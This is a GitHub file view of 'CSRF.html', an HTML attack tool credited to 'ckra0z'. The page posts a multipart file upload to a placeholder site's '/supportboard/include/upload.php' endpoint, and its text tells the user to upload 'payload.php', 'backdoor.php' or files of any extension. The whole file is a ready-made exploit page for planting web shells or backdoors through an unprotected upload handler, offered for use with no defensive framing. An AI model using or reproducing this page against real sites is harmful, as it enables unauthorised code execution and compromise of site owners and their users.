-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathCSRF.html
More file actions
56 lines (38 loc) · 1.07 KB
/
CSRF.html
File metadata and controls
56 lines (38 loc) · 1.07 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
<!-- don't edit my fucking script please -->
<html>
<header>
<script>alert("csrf by ckra0z")</script>
</header>
<head>
<center>
<h1 style="color: rgb(45, 172, 20);background-color: black; " >CSRF - TOOL
</h1>
<hr style="color: green;">
<br>
<h4 style="color: rgba(255, 0, 0, 0.959);"> BY ckra0z</h4>
</head>
<body style="background-color: black;" >
<br><br><br>
<p style="color: grey;">
<strong>
please set upload file eg <br>
payload.php/payload.html/backdoor.php/ <br>
(you can upload any extension )
</strong>
</p>
<br><br><br><br>
<form action="https://exemple.com/supportboard/include/upload.php" method="post" enctype="multipart/form-data">
<br>
<input type="file" name="file" >
<input type="submit" value="Upload" name="submit" ; >
</form>
</body>
<br> <br> <br><br><br>
<marquee style="color: yellowgreen;"> </marquee>
<br>
<progress></progress>
<br>
<footer style="background-color: darkgray;" >
all right reserved
</footer>
</html>